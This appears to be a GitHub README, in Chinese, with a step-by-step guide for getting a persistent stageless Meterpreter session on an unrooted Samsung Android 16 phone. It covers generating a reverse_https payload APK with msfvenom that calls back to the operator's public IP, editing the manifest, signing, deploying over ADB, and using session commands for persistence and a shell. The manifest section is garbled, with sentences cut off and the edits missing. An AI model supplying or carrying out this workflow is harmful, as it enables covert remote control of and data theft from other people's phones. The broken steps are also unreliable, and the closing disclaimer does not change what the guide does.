K4N3CO-LABS/Working-Meterpreter-Session-on-Android-16

GitHub: K4N3CO-LABS/Working-Meterpreter-Session-on-Android-16

该仓库记录了在未 Root 的 Android 16 三星设备上实现 Meterpreter 持久化会话的完整渗透测试工作流,包括 APK 注入、重编译、签名与部署。

Stars: 5 | Forks: 0

# Android 16 - 三星手机上的无阶段 Meterpreter 会话(无 Root,2026): [![github-banner.jpg](https://i.postimg.cc/sxhdzJLF/github-banner.jpg)](https://postimg.cc/n9pwYqZT) # Android 渗透测试工作流:APK 修改与本地部署指南: ## 关于 本仓库**记录**了将 **Metasploit payload** 注入到 **Android 应用程序包 (APK)** 中,修改 manifest 以允许**显式执行**,对二进制文件进行**加密签名**,并通过 ADB 本地**部署**以进行**安全测试**的**技术过程**。 ## 前置条件 **确保**你已**安装以下工具**并在你的**系统路径**中**可用**,并在你的 **Wi-Fi 路由器**上设置了**端口转发**: * **Wi-Fi 路由器端口转发已激活** *(`转发到你电脑的本地 IP [192.168...]`)* * **Metasploit Framework** *(`msfvenom`, `msfconsole`)* * **Apktool** * **Zipalign** * **Java Development Kit** *(`keytool`, `apksigner`)* * **Android Debug Bridge** *(`adb`)* ## 步骤 1:Payload 生成 通过**定位**到**本地机器接口**来**生成 payload**。这在**本地调试**期间会完全**绕过**网络域名解析。*`确保在 msfvenom 和 msfconsole 的 payload 设置中,对无阶段模式 ( stageless ) 使用 / ( meterpreter/reverse_https )。`* ``` msfvenom -p android/meterpreter/reverse_https LHOST=[YOUR PUBLIC IP] LPORT=443 -o payload_example.apk ``` ## 步骤 2:Manifest 修改 **反编译**二进制包以**修改其配置**,然后**重新编译**以确保**结构完整性**。 ### 1. 反编译 APK ``` apktool d payload_example.apk -o example_folder ``` ### 2. 修改 Manifest ``` cd example_folder ``` ``` nano AndroidManifest.xml ``` ``` # 将所有这些添加到 AndroidManifest.xml 的开头 ``` ``` # 将底部的 ``` ``` # 并确保这在 [ YOUR LOCAL IP:49152)` **meterpreter >** **一旦会话开始:** ``` # 查看可用命令 meterpreter > help ``` ``` # 用于持久化 meterpreter > wakelock ``` ``` # 打开应用 shell shell ``` ``` # 返回 msf exploit(multi/handler) > 而不终止会话 background ``` **一旦转入后台:** ``` # 列出会话 - msf exploit(multi/handler) > sessions -l ``` ``` # 终止特定会话 - msf exploit(multi/handler) > sessions -k 1,2,3 ``` ``` # 终止所有会话 - msf exploit(multi/handler) > sessions -K ``` ``` # 打开/重新打开会话 - msf exploit(multi/handler) > sessions -i 1 ``` ``` # 延长会话的超时时间(将 interact # 更改为会话编号,并将 timeout 更改为你想要的时间) - msf exploit(multi/handler) > sessions --interact 1 --timeout 120 ``` ### 砰!!! 你已经成功开启了**无阶段 ( stageless ) meterpreter** 会话! ### ⭐ 支持该项目 如果你觉得本指南**有用**,请考虑给项目点个**Star** ⭐ —— 这对**帮助**很大! 随时欢迎**提交贡献**! **免责声明:**本指南仅供**教育**和**授权**的安全测试目的使用。祝你使用愉快**!
标签:Android安全, APK注入, 目录枚举, 移动安全, 足迹探测